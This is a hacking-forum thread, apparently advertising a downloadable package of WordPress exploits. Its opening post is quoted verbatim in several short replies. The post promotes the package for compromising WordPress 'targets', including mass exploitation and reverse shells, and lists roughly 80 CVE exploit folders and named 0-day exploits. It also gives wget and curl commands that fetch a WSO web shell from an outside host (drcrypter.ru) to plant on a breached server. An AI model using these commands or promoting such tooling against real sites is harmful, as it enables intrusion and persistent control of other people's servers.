[ HQ ] 💚Wordpress Exploit CVE Script Pacakge💚

  • 💌Important Message to All Fellas💌

    💌Important Message to All Fellas : 💌

    ⚠️Thank you for being with us over the past year.
    To support our community, we're now offering an "Account Upgrade" for purchase.
    VIP and Legendary members get special direct downloads without needing to like or reply to threads. Upgrade now to enjoy these benefits!
    HERE Our Official Telegram

    ⛔ Spam: If someone try SCAM you or SPAM Message to you let me know we will ban them

    🏆 Download Error or Missing Link: Click on threads and report them to Our admin will re-upload for you.

    ☣️ Infected or Backdoor/RAT: If you find a virus, please report it to us via Telegram or click report in the threads, and we will completely ban them in 100%

    🎯 Our Plan : Make resource downloads on a private host without using another free upload because easy gone

    ❤️ We try our best to make everyone's shared tools clean and fresh in here, so enjoy with our fellas. ❤️

The most Powerful collection of CVEs of Wordpress. If you are a hunter or target of Wordpress, you must have this package because its must collection in big Exploit has many CVEs as well. You can exploit targets with it.
Or you can run a mass open file with one target by writing your own simple bat file and must
Some CVEs need Auth, and some exploits with Unauth exploit access with shell or reverse shell, etc.
If you have access to reverse shell, you can convert to shell.

View attachment 456

example, after you got access with command linux to the target
You can try it raw to drop your shell: wget https://drcrypter.ru/wso.php
or curl https://drcrypter.ru/wso.php -o drcrypter.php

CVE-2014-7969
CVE-2014-9473
CVE-2015-6522
CVE-2015-9391
CVE-2016-10033
CVE-2016-10990
CVE-2017-9288
CVE-2018-16285
CVE-2018-18069
CVE-2018-20462
CVE-2018-6389
CVE-2019-14470
CVE-2019-14799
CVE-2019-16332
CVE-2019-20173
CVE-2019-20361-EXPLOIT
CVE-2019-8942-RCE
CVE-2020-11738
CVE-2020-11930
CVE-2020-12800
CVE-2020-24186-WordPress-wpDiscuz-7.0.4-RCE
CVE-2020-7104
CVE-2021-24124
CVE-2021-24233
CVE-2021-24235
CVE-2021-24237
CVE-2021-24294
CVE-2021-24298
CVE-2021-24304
CVE-2021-24305
CVE-2021-24316
CVE-2021-24320
CVE-2021-24335
CVE-2021-24350
CVE-2021-24351
CVE-2021-24429
CVE-2021-24454
CVE-2021-24498
CVE-2021-24504
CVE-2021-24508
CVE-2021-24556
CVE-2021-24563
CVE-2021-24657
CVE-2021-24756
CVE-2021-24762
CVE-2021-24765
CVE-2021-24792
CVE-2021-24796
CVE-2021-24797
CVE-2021-24814
CVE-2021-24964
CVE-2021-24967
CVE-2021-24973
CVE-2021-24975
CVE-2021-24977
CVE-2021-25078
CVE-2021-25080
CVE-2021-25086
CVE-2021-25094-tatsu-preauth-rce
CVE-2021-25099
CVE-2021-25107
CVE-2022-0220
CVE-2022-0230
CVE-2022-0248
CVE-2022-0385
CVE-2022-0429
CVE-2022-0680
CVE-2022-0780
CVE-2022-0818
CVE-2022-1167
CVE-2022-1168
CVE-2022-1169
CVE-2022-1170
CVE-2022-1582
CVE-2022-23988
CVE-2022-29455
LICENSE
README.md
Wordpress-Plugin-Spritz-RFI
WORDPRESS-Revslider-Exploit-0DAY
WordPress_4.9.8_RCE_POC
WP-augmented-reality-RCE
WP-Content-Injection-Exploit
wp-file-manager-CVE-2020-25213
wp-gravity-form-exploit
wp-plugin-amministrazione-aperta-LFI
WP-SMTP-0DAY

drcrypter.ru

*** Hidden text: cannot be quoted. ***
thank u
 
The most Powerful collection of CVEs of Wordpress. If you are a hunter or target of Wordpress, you must have this package because its must collection in big Exploit has many CVEs as well. You can exploit targets with it.
Or you can run a mass open file with one target by writing your own simple bat file and must
Some CVEs need Auth, and some exploits with Unauth exploit access with shell or reverse shell, etc.
If you have access to reverse shell, you can convert to shell.

View attachment 456

example, after you got access with command linux to the target
You can try it raw to drop your shell: wget https://drcrypter.ru/wso.php
or curl https://drcrypter.ru/wso.php -o drcrypter.php

CVE-2014-7969
CVE-2014-9473
CVE-2015-6522
CVE-2015-9391
CVE-2016-10033
CVE-2016-10990
CVE-2017-9288
CVE-2018-16285
CVE-2018-18069
CVE-2018-20462
CVE-2018-6389
CVE-2019-14470
CVE-2019-14799
CVE-2019-16332
CVE-2019-20173
CVE-2019-20361-EXPLOIT
CVE-2019-8942-RCE
CVE-2020-11738
CVE-2020-11930
CVE-2020-12800
CVE-2020-24186-WordPress-wpDiscuz-7.0.4-RCE
CVE-2020-7104
CVE-2021-24124
CVE-2021-24233
CVE-2021-24235
CVE-2021-24237
CVE-2021-24294
CVE-2021-24298
CVE-2021-24304
CVE-2021-24305
CVE-2021-24316
CVE-2021-24320
CVE-2021-24335
CVE-2021-24350
CVE-2021-24351
CVE-2021-24429
CVE-2021-24454
CVE-2021-24498
CVE-2021-24504
CVE-2021-24508
CVE-2021-24556
CVE-2021-24563
CVE-2021-24657
CVE-2021-24756
CVE-2021-24762
CVE-2021-24765
CVE-2021-24792
CVE-2021-24796
CVE-2021-24797
CVE-2021-24814
CVE-2021-24964
CVE-2021-24967
CVE-2021-24973
CVE-2021-24975
CVE-2021-24977
CVE-2021-25078
CVE-2021-25080
CVE-2021-25086
CVE-2021-25094-tatsu-preauth-rce
CVE-2021-25099
CVE-2021-25107
CVE-2022-0220
CVE-2022-0230
CVE-2022-0248
CVE-2022-0385
CVE-2022-0429
CVE-2022-0680
CVE-2022-0780
CVE-2022-0818
CVE-2022-1167
CVE-2022-1168
CVE-2022-1169
CVE-2022-1170
CVE-2022-1582
CVE-2022-23988
CVE-2022-29455
LICENSE
README.md
Wordpress-Plugin-Spritz-RFI
WORDPRESS-Revslider-Exploit-0DAY
WordPress_4.9.8_RCE_POC
WP-augmented-reality-RCE
WP-Content-Injection-Exploit
wp-file-manager-CVE-2020-25213
wp-gravity-form-exploit
wp-plugin-amministrazione-aperta-LFI
WP-SMTP-0DAY

drcrypter.ru

*** Hidden text: cannot be quoted. ***
g
 
The most Powerful collection of CVEs of Wordpress. If you are a hunter or target of Wordpress, you must have this package because its must collection in big Exploit has many CVEs as well. You can exploit targets with it.
Or you can run a mass open file with one target by writing your own simple bat file and must
Some CVEs need Auth, and some exploits with Unauth exploit access with shell or reverse shell, etc.
If you have access to reverse shell, you can convert to shell.

View attachment 456

example, after you got access with command linux to the target
You can try it raw to drop your shell: wget https://drcrypter.ru/wso.php
or curl https://drcrypter.ru/wso.php -o drcrypter.php

CVE-2014-7969
CVE-2014-9473
CVE-2015-6522
CVE-2015-9391
CVE-2016-10033
CVE-2016-10990
CVE-2017-9288
CVE-2018-16285
CVE-2018-18069
CVE-2018-20462
CVE-2018-6389
CVE-2019-14470
CVE-2019-14799
CVE-2019-16332
CVE-2019-20173
CVE-2019-20361-EXPLOIT
CVE-2019-8942-RCE
CVE-2020-11738
CVE-2020-11930
CVE-2020-12800
CVE-2020-24186-WordPress-wpDiscuz-7.0.4-RCE
CVE-2020-7104
CVE-2021-24124
CVE-2021-24233
CVE-2021-24235
CVE-2021-24237
CVE-2021-24294
CVE-2021-24298
CVE-2021-24304
CVE-2021-24305
CVE-2021-24316
CVE-2021-24320
CVE-2021-24335
CVE-2021-24350
CVE-2021-24351
CVE-2021-24429
CVE-2021-24454
CVE-2021-24498
CVE-2021-24504
CVE-2021-24508
CVE-2021-24556
CVE-2021-24563
CVE-2021-24657
CVE-2021-24756
CVE-2021-24762
CVE-2021-24765
CVE-2021-24792
CVE-2021-24796
CVE-2021-24797
CVE-2021-24814
CVE-2021-24964
CVE-2021-24967
CVE-2021-24973
CVE-2021-24975
CVE-2021-24977
CVE-2021-25078
CVE-2021-25080
CVE-2021-25086
CVE-2021-25094-tatsu-preauth-rce
CVE-2021-25099
CVE-2021-25107
CVE-2022-0220
CVE-2022-0230
CVE-2022-0248
CVE-2022-0385
CVE-2022-0429
CVE-2022-0680
CVE-2022-0780
CVE-2022-0818
CVE-2022-1167
CVE-2022-1168
CVE-2022-1169
CVE-2022-1170
CVE-2022-1582
CVE-2022-23988
CVE-2022-29455
LICENSE
README.md
Wordpress-Plugin-Spritz-RFI
WORDPRESS-Revslider-Exploit-0DAY
WordPress_4.9.8_RCE_POC
WP-augmented-reality-RCE
WP-Content-Injection-Exploit
wp-file-manager-CVE-2020-25213
wp-gravity-form-exploit
wp-plugin-amministrazione-aperta-LFI
WP-SMTP-0DAY

drcrypter.ru

*** Hidden text: cannot be quoted. ***
zabouuur
 
The most Powerful collection of CVEs of Wordpress. If you are a hunter or target of Wordpress, you must have this package because its must collection in big Exploit has many CVEs as well. You can exploit targets with it.
Or you can run a mass open file with one target by writing your own simple bat file and must
Some CVEs need Auth, and some exploits with Unauth exploit access with shell or reverse shell, etc.
If you have access to reverse shell, you can convert to shell.

View attachment 456

example, after you got access with command linux to the target
You can try it raw to drop your shell: wget https://drcrypter.ru/wso.php
or curl https://drcrypter.ru/wso.php -o drcrypter.php

CVE-2014-7969
CVE-2014-9473
CVE-2015-6522
CVE-2015-9391
CVE-2016-10033
CVE-2016-10990
CVE-2017-9288
CVE-2018-16285
CVE-2018-18069
CVE-2018-20462
CVE-2018-6389
CVE-2019-14470
CVE-2019-14799
CVE-2019-16332
CVE-2019-20173
CVE-2019-20361-EXPLOIT
CVE-2019-8942-RCE
CVE-2020-11738
CVE-2020-11930
CVE-2020-12800
CVE-2020-24186-WordPress-wpDiscuz-7.0.4-RCE
CVE-2020-7104
CVE-2021-24124
CVE-2021-24233
CVE-2021-24235
CVE-2021-24237
CVE-2021-24294
CVE-2021-24298
CVE-2021-24304
CVE-2021-24305
CVE-2021-24316
CVE-2021-24320
CVE-2021-24335
CVE-2021-24350
CVE-2021-24351
CVE-2021-24429
CVE-2021-24454
CVE-2021-24498
CVE-2021-24504
CVE-2021-24508
CVE-2021-24556
CVE-2021-24563
CVE-2021-24657
CVE-2021-24756
CVE-2021-24762
CVE-2021-24765
CVE-2021-24792
CVE-2021-24796
CVE-2021-24797
CVE-2021-24814
CVE-2021-24964
CVE-2021-24967
CVE-2021-24973
CVE-2021-24975
CVE-2021-24977
CVE-2021-25078
CVE-2021-25080
CVE-2021-25086
CVE-2021-25094-tatsu-preauth-rce
CVE-2021-25099
CVE-2021-25107
CVE-2022-0220
CVE-2022-0230
CVE-2022-0248
CVE-2022-0385
CVE-2022-0429
CVE-2022-0680
CVE-2022-0780
CVE-2022-0818
CVE-2022-1167
CVE-2022-1168
CVE-2022-1169
CVE-2022-1170
CVE-2022-1582
CVE-2022-23988
CVE-2022-29455
LICENSE
README.md
Wordpress-Plugin-Spritz-RFI
WORDPRESS-Revslider-Exploit-0DAY
WordPress_4.9.8_RCE_POC
WP-augmented-reality-RCE
WP-Content-Injection-Exploit
wp-file-manager-CVE-2020-25213
wp-gravity-form-exploit
wp-plugin-amministrazione-aperta-LFI
WP-SMTP-0DAY

drcrypter.ru

*** Hidden text: cannot be quoted. ***
thank
 
The most Powerful collection of CVEs of Wordpress. If you are a hunter or target of Wordpress, you must have this package because its must collection in big Exploit has many CVEs as well. You can exploit targets with it.
Or you can run a mass open file with one target by writing your own simple bat file and must
Some CVEs need Auth, and some exploits with Unauth exploit access with shell or reverse shell, etc.
If you have access to reverse shell, you can convert to shell.

View attachment 456

example, after you got access with command linux to the target
You can try it raw to drop your shell: wget https://drcrypter.ru/wso.php
or curl https://drcrypter.ru/wso.php -o drcrypter.php

CVE-2014-7969
CVE-2014-9473
CVE-2015-6522
CVE-2015-9391
CVE-2016-10033
CVE-2016-10990
CVE-2017-9288
CVE-2018-16285
CVE-2018-18069
CVE-2018-20462
CVE-2018-6389
CVE-2019-14470
CVE-2019-14799
CVE-2019-16332
CVE-2019-20173
CVE-2019-20361-EXPLOIT
CVE-2019-8942-RCE
CVE-2020-11738
CVE-2020-11930
CVE-2020-12800
CVE-2020-24186-WordPress-wpDiscuz-7.0.4-RCE
CVE-2020-7104
CVE-2021-24124
CVE-2021-24233
CVE-2021-24235
CVE-2021-24237
CVE-2021-24294
CVE-2021-24298
CVE-2021-24304
CVE-2021-24305
CVE-2021-24316
CVE-2021-24320
CVE-2021-24335
CVE-2021-24350
CVE-2021-24351
CVE-2021-24429
CVE-2021-24454
CVE-2021-24498
CVE-2021-24504
CVE-2021-24508
CVE-2021-24556
CVE-2021-24563
CVE-2021-24657
CVE-2021-24756
CVE-2021-24762
CVE-2021-24765
CVE-2021-24792
CVE-2021-24796
CVE-2021-24797
CVE-2021-24814
CVE-2021-24964
CVE-2021-24967
CVE-2021-24973
CVE-2021-24975
CVE-2021-24977
CVE-2021-25078
CVE-2021-25080
CVE-2021-25086
CVE-2021-25094-tatsu-preauth-rce
CVE-2021-25099
CVE-2021-25107
CVE-2022-0220
CVE-2022-0230
CVE-2022-0248
CVE-2022-0385
CVE-2022-0429
CVE-2022-0680
CVE-2022-0780
CVE-2022-0818
CVE-2022-1167
CVE-2022-1168
CVE-2022-1169
CVE-2022-1170
CVE-2022-1582
CVE-2022-23988
CVE-2022-29455
LICENSE
README.md
Wordpress-Plugin-Spritz-RFI
WORDPRESS-Revslider-Exploit-0DAY
WordPress_4.9.8_RCE_POC
WP-augmented-reality-RCE
WP-Content-Injection-Exploit
wp-file-manager-CVE-2020-25213
wp-gravity-form-exploit
wp-plugin-amministrazione-aperta-LFI
WP-SMTP-0DAY

drcrypter.ru

*** Hidden text: cannot be quoted. ***
thank u bos
sssssss
 

Forum statistics

Threads
1,775
Messages
35,463
Members
8,178
Latest member
beastxx
Member time online
649d 1h 38m
Reputation(s)
26